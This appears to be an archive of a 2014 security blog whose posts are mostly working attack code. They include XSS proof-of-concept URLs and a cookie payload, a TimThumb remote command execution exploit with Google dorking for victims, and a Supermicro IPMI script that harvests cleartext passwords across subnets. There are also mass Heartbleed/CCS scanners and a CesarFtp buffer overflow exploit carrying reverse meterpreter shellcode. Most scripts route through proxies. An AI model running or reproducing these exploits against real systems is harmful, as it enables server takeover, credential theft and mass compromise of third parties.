Monday, July 21, 2014

MyConnection Server (MCS) Reflective XSS



Author: 1N3
Website: http://treadstonesecurity.blogspot.ca
Vender Website: http://www.visualware.com/
Affected Product: MyConnection Server
Affected Version: 9.7i (others may also be vulnerable)

ABOUT:
MyConnection Server (MCS) delivers a broad range of support managed automated and user initiated self-help connection testing and monitoring services directly via the browser to any online customer/location anywhere in the world. Due to a failure to sanitize certain GET variables passed to the connection test page (usually test.php), it is possible to inject client side javascript to run in the context of the user browsing the website. Several parameters including testtype, ver, cm, map, lines, duration and others appear to be vulnerable.


POC:
http://scrubbedhost.com/test.php?testtype=1"><script>alert(1);</script>&codebase=myspeed.pathcom.com&location=Canada:%20Toronto,%20ON&ver=1"><script>alert(1);</script>&cm=1"><script>alert(1);</script>&map=1"><script>alert(1);</script>&lines=1"><script>alert(1);</script>&pps=1"><script>alert(1);</script>&bpp=1"><script>alert(1);</script>&codec=1"><script>alert(1);</script>&provtext=1"><script>alert(1);</script>&provtextextra=11"><script>alert(1);</script>&provlink=1"><script>alert(1);</script>


VULNERABLE CODE:

* Both voiplines and testlength are written to the end user without being properly sanitized and thus vulnerable to reflective XSS.

<td valign="top" width="30%"><b>Current
    Settings</b>
          <br>
          <br>
          <b>VoIP Lines Simulated</b>:
          <script type="text/javascript"> document.write(voiplines); </script><br>
          <b>Test Length</b>:
          <script type="text/javascript"> document.write(testlength); </script><br>
          <b>Codec</b>:
          <script type="text/javascript"> if (codec == "g711") { document.write(nameg711); }
    else { document.write(nameg729); }
          </script><br>
          </td>
          <td align="left" width="70%">
          <p align="center">
<script>


Friday, June 27, 2014

TimThumb WebShot Code Execution Exploit (0-day)

 


#!/bin/bash
# Wordpress TimThumb Remote Command Execution Exploit (0day) v20140627 by 1N3
# (c) http://treadstonesecurity.blogspot.ca
# Usage: sh timthumb_0day.sh <IP|domain.com|google> </path/to/timthumb.php> [proxy] [command]
#
# ABOUT:
# TimThumb’s “Webshot” feature that allows for certain commands to be executed on the
# vulnerable website remotely (no authentication required). With a simple command, an
# attacker can create, remove and modify any files on your server. Timthumb 2.8.11-2.8.13
# with the WEBSHOT_ENABLED option enabled appear to be vulnerable.
#
# USAGE:
# ./timthumb_0day.sh <IP|domain.com|google> </path/to/timthumb.php> [proxy] [command]
#
# NOTE: proxy and command fields are optional.
#
# EXAMPLE:
# ./timthumb_0day.sh domain.com /wp-content/plugins/timthumb/timthumb.php
# ./timthumb_0day.sh domain.com /wp-content/plugins/timthumb/timthumb.php none rm$IFS/tmp/a.txt
# ./timthumb_0day.sh domain.com /wp-content/plugins/timthumb/timthumb.php proxy 'rm$IFS/tmp/a.txt'

# BANNER
clear
echo "(--==== http://treadstonesecurity.blogspot.ca"
echo "(--==== Wordpress TimThumb Remote Command Execution Exploit (0day) by 1N3"
echo ""

# VARS
UNICORNSCAN=`which unicornscan`
CURL=`which curl`
PROXYCHAINS=`which proxychains`
TARGET=$1
BASE_PATH=$2
PROXY=$3
COMMAND=$4

# REQUIREMENTS
if [ "$PROXYCHAINS" == "" ]; then
    echo "(--==== Proxychains not installed! Continuing scan without proxy support..."
    exit
fi

if [ "$CURL" == "" ]; then
    echo "(--==== Curl not installed! Exiting..."
    exit
fi

if [ -z "$TARGET" ] || [ -z "$BASE_PATH" ]; then
    echo "(--==== Usage: $0 <IP|domain.com|google> </path/to/timthumb.php> [proxy] [command]"
    exit
fi

if [ $TARGET == "google" ]; then
# USE GOOGLE HACKING TO FIND VULNERABLE SERVERS
    echo "Searching Google..."
    iceweasel 'https://www.google.com/search?q=TimThumb+version+%3A+2.8.13&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=iceweasel-a#q=inurl:%27%2Ftimthumb.php%27+filetype:php+inurl:plugins+inurl:wp-content&rls=org.mozilla:en-US:unofficial' &
    exit
fi

if [ "$PROXY" = "proxy" ]; then
#PROXY ENABLED
    echo "(--==== Scanning via proxy..."

    if [ -z $COMMAND ]; then
        # RUN DEFAULT COMMAND (ie. touch /tmp/a.txt)
        echo "(--==== Sending exploit request to: "$TARGET
        echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)'
        proxychains curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)' | grep version
        echo "(--==== Exploit Sent! Check the local system for /tmp/a.txt..."
    else
        # RUN CUSTOM COMMAND
        echo "(--==== Sending exploit request to: "$TARGET
        echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')'
        proxychains curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')' | grep version
        echo "(--==== Exploit Sent!"
    fi
    exit

else
# NO PROXY
    echo "(--==== Scanning via direct connection..."

    if [ -z $COMMAND ]; then
        # RUN DEFAULT COMMAND (ie. touch /tmp/a.txt)
        echo "(--==== Sending exploit request to: "$TARGET
        echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)'
        curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)' | grep version
        echo "(--==== Exploit Sent! Check the local system for /tmp/a.txt..."
    else
        # RUN CUSTOM COMMAND
        echo "(--==== Sending exploit request to: "$TARGET
        echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')'
        curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')' | grep version
        echo "(--==== Exploit Sent!"
    fi
    exit
fi

echo ""
echo "(--==== Scan Complete!"
exit

Saturday, June 21, 2014

Supermicro IPMI/BMC Cleartext Password Scanner


#!/bin/bash
# Supermicro IPMI/BMC Cleartext Password Scanner v20140622 by 1N3
# http://treadstonesecurity.blogspot.ca
# Usage: sh supermicro_scan.sh <CIDR|IP|showdan> [proxy]
#
# ABOUT:
# Supermicro’s implementation of IPMI/BMC allows remote, unauthenticated attackers to
# request the file PSBlock via port 49152. This plain text password file contains IPMI
# username and password information. This script allows users to scan their networks
# check for vulnerable systems that require patching.
#
# USAGE:
# ./supermicro_scan.sh 74.200.8.237 - Single host scan
# ./supermicro_scan.sh 74.200.0.0/16 proxy - Subnet scan with proxy
# ./supermicro_scan.sh showdan - Search for vulnerable servers on ShowdanHQ
#

clear
echo "(--==== http://treadstonesecurity.blogspot.ca"
echo "(--==== Supermicro IPMI Cleartext Password Scanner by 1N3"
echo ""

UNICORNSCAN=`which unicornscan`
CURL=`which curl`
PROXYCHAINS=`which proxychains`
TARGET=$1
PROXY=$2

if [ "$UNICORNSCAN" == "" ]; then
    echo "(--==== Unicornscan not installed! Exiting..."
    exit
fi

if [ "$PROXYCHAINS" == "" ]; then
    echo "(--==== Proxychains not installed! Continuing scan without proxy support..."
    exit
fi

if [ "$CURL" == "" ]; then
    echo "(--==== Curl not installed! Exiting..."
    exit
fi

if [ -z "$1" ]; then
    echo "(--==== Usage: $0 <CIDR|IP> [proxy]"
    exit
fi

if [ $TARGET == "shodan" ]; then
# SCAN USING SHODANHQ SEARCH
    echo "Searching ShowdanHQ..."
    iceweasel http://www.shodanhq.com/search?q=Content-Length%3D3269 &
    exit
fi

if [ "$PROXY" = "proxy" ]; then
#PROXY ENABLED
    echo "(--==== Scanning via proxy..."
    # SCAN FOR THE DEFAULT FILES AND PORTS
    for a in `unicornscan -p 49152 $TARGET 2>/dev/null | awk '{print $5}'`; do
        echo "(--==== Extracting User/Pass from $a"
        echo "(--==== Sending GET http://$a:49152/PSBlock"
        proxychains curl http://$a:49152/PSBlock -m 3 --retry 1 -f -# | strings
    done
    exit

else
# NO PROXY
    echo "(--==== Scanning via direct connection..."
    # SCAN FOR THE DEFAULT FILES AND PORTS
    for a in `unicornscan -p 49152 $TARGET 2>/dev/null | awk '{print $5}'`; do
        echo "(--==== Extracting User/Pass from $a"
        echo "(--==== Sending GET http://$a:49152/PSBlock"
        curl http://$a:49152/PSBlock -m 3 --retry 1 -f -# | strings
    done
    exit

fi

echo ""
echo "(--==== Scan Complete!"
exit

Monday, June 9, 2014

AlogoSec FireFlow v6.3 XSS/HTML Injection Flaws


x---==== Exploit Title: AlogoSec FireFlow v6.3 XSS/HTML Injection Flaws
x---==== Date: Mon Jun 9 2014
x---==== Author: 1N3
x---==== Homepage: http://treadstonesecurity.blogspot.ca
x---==== Software Link: http://www.algosec.com/en/products_solutions/products/fireflow
x---==== Version: 6.3 (Other versions may also be susceptible)

x---==== Vulnerability
Form fields in the user preferences screen in AlgoSec FireFlow v6.3-b230 are vulnerable to reflective XSS and HTML injection attacks. This may allow attackers to automatically execute arbitrary javascript on behalf of other logged in users on the system by substituting XSS code in their signature.

x---==== Vulnerable URL:
https://fireflowhostname.com/FireFlow/SelfService/Prefs.html

x---==== XSS Code:
<script>alert(document.cookie)</script>

Friday, June 6, 2014

OpenSSL CCS & HeartBleed Mass Scanner


#!/bin/bash
# MassBleed OpenSSL Scanner v20140609 by 1N3
# http://treadstonesecurity.blogspot.ca
# Usage: sh massbleed.sh <CIDR|IP> <single|port|subnet> [port] [proxy]
#
# ABOUT:
# This script has four main functions with the ability to proxy all connections:
# 1. To mass scan any CIDR range for OpenSSL vulnerabilities via port 443/tcp (https) (example: sh massbleed.sh 192.168.0.0/16)
# 2. To scan any CIDR range for OpenSSL vulnerabilities via any custom port specified (example: sh massbleed.sh 192.168.0.0/16 port 8443)
# 3. To individual scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh massbleed.sh 127.0.0.1 single)
# 4. To scan every open port on every host in a single class C subnet for OpenSSL vulnerabilities (example: sh massbleed.sh 192.168.0. subnet)
#
# PROXY: A proxy option has been added to scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work.
#
# PROXY USAGE EXAMPLES:
# (example: sh massbleed.sh 192.168.0.0/16 0 0 proxy)
# (example: sh massbleed.sh 192.168.0.0/16 port 8443 proxy)
# (example: sh massbleed.sh 127.0.0.1 single 0 proxy)
# (example: sh massbleed.sh 192.168.0. subnet 0 proxy)
#
# VULNERABILITIES:
# 1. OpenSSL HeartBleed Vulnerability (CVE-2014-0160)
# 2. OpenSSL CCS (MITM) Vulnerability (CVE-2014-0224)
#
# REQUIREMENTS:
# Is the heartbleed POC present?
# Is the openssl CCS script present?
# Is unicornscan installed?
# Is nmap installed?

echo "(--==== http://treadstonesecurity.blogspot.ca"
echo "(--==== MassBleed OpenSSL Scanner by 1N3"
echo ""

HEARTBLEED=`ls heartbleed.py`
OPENSSL_CCS=`ls openssl_ccs.pl`
UNICORNSCAN=`which unicornscan`
NMAP=`which nmap`
RANGE=$1
SCAN_TYPE=$2
CUSTOM_PORT=$3
PROXY=$4
PORT_RANGE="1-65000"

if [ "$HEARTBLEED" != "heartbleed.py" ]; then
    echo "(--==== heartbleed.py not found!"
    echo "(--==== To fix, download the POC by Jared Stafford (https://gist.github.com/sh1n0b1/10100394) and place in same directory named: heartbleed.py"
    exit
fi

if [ "$OPENSSL_CCS" != "openssl_ccs.pl" ]; then
    echo "(--==== openssl_ccs.pl not found!"
    echo "(--==== To fix, download the script from RedHat (https://access.redhat.com/labs/ccsinjectiontest/) and place in same directory named: openssl_ccs.pl"
    exit
fi

if [ "$UNICORNSCAN" == "" ]; then
    echo "(--==== Unicornscan not installed! Exiting..."
    exit
fi

if [ "$NMAP" == "" ]; then
    echo "(--==== Nmap not installed! Exiting..."
    exit
fi

if [ -z "$1" ]; then
    echo "(--==== Usage: $0 <CIDR|IP> <single|port|subnet> [port] [proxy]"
    exit
fi

if [ "$PROXY" = "proxy" ]; then
    echo "(--==== Scanning via proxy..."
    if [ "$SCAN_TYPE" = "single" ]; then
        if [ "$CUSTOM_PORT" != "0" ]; then
            echo "(--==== Checking HeartBleed: $RANGE:$CUSTOM_PORT" && proxychains python heartbleed.py $RANGE -p $CUSTOM_PORT | grep vulnerable
            echo "(--==== Checking OpenSSL CCS: $RANGE:$CUSTOM_PORT" && proxychains perl openssl_ccs.pl $RANGE $CUSTOM_PORT | grep affected;
        else
            for a in `proxychains unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`;
                do
                    echo "(--==== Checking HeartBleed $RANGE:"$a && proxychains python heartbleed.py $RANGE -p $a | grep vulnerable
                    echo "(--==== Checking OpenSSL CCS $RANGE:"$a && proxychains perl openssl_ccs.pl $RANGE $a | grep affected;
            done;
        fi
    fi
    if [ "$SCAN_TYPE" = "subnet" ]; then
        for a in {1..254};
        do
            echo "(--==== Scanning: $RANGE$a"
            for b in `proxychains unicornscan "$RANGE$a" -mT -r500 | awk '{print $4}' | cut -d']' -f1`;
                do
                echo "(--==== $RANGE$a:$b"
                echo "(--==== Checking HeartBleed:" && proxychains python heartbleed.py $RANGE$a -p $b | grep vulnerable
                echo "(--==== Checking OpenSSL CCS:" && proxychains perl heartbleed.py $RANGE$a $b | grep affected
            done;
        done;
    fi
    if [ "$SCAN_TYPE" = "port" ]; then
        for a in `proxychains unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`;
            do
                echo "(--==== Checking HeartBleed:" $a:$CUSTOM_PORT && proxychains python heartbleed.py $a -p $CUSTOM_PORT | grep vulnerable
                echo "(--==== Checking OpenSSL CCS:" $a:$CUSTOM_PORT && proxychains perl openssl_ccs.pl $a $CUSTOM_PORT | grep affected
        done;
    else
        for a in `proxychains unicornscan $RANGE -p 443 | awk '{print $6}'`;
            do
                echo "(--==== Checking HeartBleed:" $a && proxychains python heartbleed.py $a -p 443 | grep vulnerable
                echo "(--==== Checking OpenSSL CCS:" $a && proxychains perl openssl_ccs.pl $a 443 | grep affected
        done
    fi
else
    if [ "$SCAN_TYPE" = "single" ]; then
        for a in `unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`;
            do
                echo "(--==== Checking HeartBleed $RANGE:"$a && python heartbleed.py $RANGE -p $a | grep vulnerable
                echo "(--==== Checking OpenSSL CCS $RANGE:"$a && perl openssl_ccs.pl $RANGE $a | grep affected
        done;
    fi
    if [ "$SCAN_TYPE" = "subnet" ]; then
        for a in {1..254};
        do
            echo "(--==== Scanning: $RANGE$a"
            for b in `unicornscan "$RANGE$a" -mT -r500 | awk '{print $4}' | cut -d']' -f1`;
                do
                    echo "$RANGE$a:$b"
                    echo "(--==== Checking HeartBleed:" && python heartbleed.py $RANGE$a -p $b | grep vulnerable
                    echo "(--==== Checking OpenSSL CCS:" && perl openssl_ccs.pl $RANGE$a $b | grep affected
            done;
        done;
    fi
    if [ "$SCAN_TYPE" = "port" ]; then
        for a in `unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`;
            do
                echo "(--==== Checking HeartBleed:" $a:$CUSTOM_PORT && python heartbleed.py $a -p $CUSTOM_PORT | grep vulnerable
                echo "(--==== Checking OpenSSL CCS:" $a:$CUSTOM_PORT && perl openssl_ccs.pl $a $CUSTOM_PORT | grep affected
        done;
    else
        for a in `unicornscan $RANGE -p 443 | awk '{print $6}'`;
            do
                echo "(--==== Checking HeartBleed:" $a && python heartbleed.py $a -p 443 | grep vulnerable
                echo "(--==== Checking OpenSSL CCS:" $a && perl openssl_ccs.pl $a 443 | grep affected
        done
    fi
fi

echo "(--==== Scan Complete!"
exit

Saturday, April 26, 2014

CesarFtp 0.99g Buffer Overflow Exploit

#!/usr/bin/python
#CesarFtp 0.99g Buffer Overflow Exploit by 1N3 @ treadstonesecurity.blogspot.ca
#Uses Metasploit's exploit/multi/handler reverse meterpreter shellcode to gain remote access to the target. Replace as needed.

from socket import *

shellcode = ( # reverse meterpreter shell 4444
"\xbb\x9c\x7e\x21\x9b\xdb\xca\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x18\x31\x5a\x13\x83\xc2\x04\x03\x5a\x93\x9c\xd4\x67\x9a\xbb"
"\x73\x13\x9f\x0b\xf7\x63\x13\xe7\x57\x78\xa0\xe5\xdc\xf2\x96"
"\xa4\x4e\xbc\xd5\xb0\xad\x73\xea\xe3\xff\x06\xe3\x97\x6a\xe1"
"\x70\xe2\x56\x7a\xca\xe8\xde\xf7\x9e\xff\x02\x09\xf7\x8b\x7a"
"\x51\x06\x64\xf7\x10\x34\x75\xe6\xd0\x2d\x79\xa5\xbc\xac\xeb"
"\x4b\xbe\x7e\x7c\x23\x80\xd6\x94\xbe\x68\x24\x9b\xaf\x34\xa1"
"\x7a\x9c\x73\xbd\x2f\x72\x2b\xec\xa5\x64\x82\x59\x6c\x7a\xc1")

def intel_order(i):
    a = chr(i % 256)
    i = i >> 8
    b = chr(i % 256)
    i = i >> 8
    c = chr(i % 256)
    i = i >> 8
    d = chr(i % 256)
    str = "%c%c%c%c" % (a, b, c, d)
    return str

host = "192.168.23.112"
port = 21
user = "ftp"
password = "ftp"
#EIP = 0x77D718FC #jmp esp <user32.dll XP SP1 english>
EIP = 0x76AA679b #jmp esp <metasploit module>

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)

s.send("user %s\r\n" % (user))
print s.recv(1024)

s.send("pass %s\r\n" % (password))
print s.recv(1024)

buffer = "MKD "
buffer += "\n" * 671
buffer += "A" * 3 + intel_order(EIP)
buffer += "\x90" * 40 + shellcode
buffer += "\r\n"

print "len: %d" % (len(buffer))

s.send(buffer)
print s.recv(1024)

s.close()

Wednesday, April 16, 2014

MassBleed OpenSSL HeartBleed Scanner



#!/bin/bash
# massbleed.sh 20140423 by 1N3
# http://treadstonesecurity.blogspot.ca
# Usage: sh massbleed.sh <CIDR|IP> <single|port|subnet> [port] [proxy]
#
# This script has four main functions with the ability to proxy all connections:
# 1. To mass scan any CIDR range for HeartBleed via port 443/tcp (https) (example: sh massbleed.sh 192.168.0.0/16)
# 2. To scan any CIDR range for HeartBleed via any custom port specified (example: sh massbleed.sh 192.168.0.0/16 port 8443)
# 3. To individual scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh massbleed.sh 127.0.0.1 single)
# 4. To scan every open port on every host in a single class C subnet for HeartBleed (example: sh massbleed.sh 192.168.0. subnet)
#
# PROXY: A proxy option has been added to scan and run the scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work.
# USAGE EXAMPLES:
# (example: sh massbleed.sh 192.168.0.0/16 0 0 proxy)
# (example: sh massbleed.sh 192.168.0.0/16 port 8443 proxy)
# (example: sh massbleed.sh 127.0.0.1 single 0 proxy)
# (example: sh massbleed.sh 192.168.0. subnet 0 proxy)
#
# Prerequisites:
# Is the heartbleed POC present?
# Is unicornscan installed?
# Is nmap installed?

echo "(--==== http://treadstonesecurity.blogspot.ca"
echo "(--==== massbleed.sh 20140423 by 1N3"
echo ""

HEARTBLEED=`ls heartbleed.py`
UNICORNSCAN=`which unicornscan`
NMAP=`which nmap`
RANGE=$1
ALL_PORTS=$2
CUSTOM_PORT=$3
PROXY=$4
PORT_RANGE="1-65000"

if [ "$HEARTBLEED" != "heartbleed.py" ]; then
    echo "(--==== heartbleed.py not found!"
    echo "(--==== To fix, download the POC by Jared Stafford and place in same directory named: heartbleed.py"
    exit
fi

if [ "$UNICORNSCAN" == "" ]; then
    echo "(--==== unicornscan not installed! Exiting..."
    exit
fi

if [ "$NMAP" == "" ]; then
    echo "(--==== nmap not installed! Exiting..."
    exit
fi

if [ -z "$1" ]; then
    echo "(--==== usage: $0 <CIDR|IP> <single|port|subnet> [port] [proxy]"
    exit
fi

if [ "$PROXY" = "proxy" ]; then
    echo "(--==== scanning via proxy..."
    if [ "$ALL_PORTS" = "single" ]; then
        if [ "$CUSTOM_PORT" != "0" ]; then
            echo "(--==== Checking $RANGE:$CUSTOM_PORT" && proxychains python heartbleed.py $RANGE -p $CUSTOM_PORT | grep Server 2> /dev/null
        else
            for a in `proxychains unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`;
                do echo "(--==== Checking $RANGE:"$a && proxychains python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null;
            done;
        fi
    fi
    if [ "$ALL_PORTS" = "subnet" ]; then
        for a in {1..254};
        do
            echo "Scanning: $RANGE$a"
            for b in `proxychains unicornscan "$RANGE$a" -mT -r500 | awk '{print $4}' | cut -d']' -f1`;
                do
                echo "$RANGE$a:$b"
                proxychains python heartbleed.py $RANGE$a -p $b | grep Server;
            done;
        done;
    fi
    if [ "$ALL_PORTS" = "port" ]; then
        for a in `proxychains unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`;
            do echo "(--==== Checking:" $a:$CUSTOM_PORT&& proxychains python heartbleed.py $a -p $CUSTOM_PORT | grep Server;
        done;
    else
        for a in `proxychains unicornscan $RANGE -p 443 | awk '{print $6}'`;
            do echo "(--==== Checking:" $a && proxychains python heartbleed.py $a -p 443 | grep Server;
        done
    fi
else
    if [ "$ALL_PORTS" = "single" ]; then
        for a in `unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`;
            do echo "(--==== Checking $RANGE:"$a && python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null;
        done;
    fi
    if [ "$ALL_PORTS" = "subnet" ]; then
        for a in {1..254};
        do
            echo "Scanning: $RANGE$a"
            for b in `unicornscan "$RANGE$a" -mT -r500 | awk '{print $4}' | cut -d']' -f1`;
                do
                echo "$RANGE$a:$b"
                python heartbleed.py $RANGE$a -p $b | grep Server;
            done;
        done;
    fi
    if [ "$ALL_PORTS" = "port" ]; then
        for a in `unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`;
            do echo "(--==== Checking:" $a:$CUSTOM_PORT&& python heartbleed.py $a -p $CUSTOM_PORT | grep Server;
        done;
    else
        for a in `unicornscan $RANGE -p 443 | awk '{print $6}'`;
            do echo "(--==== Checking:" $a && python heartbleed.py $a -p 443 | grep Server;
        done
    fi
fi

echo "(--==== scan complete!"
exit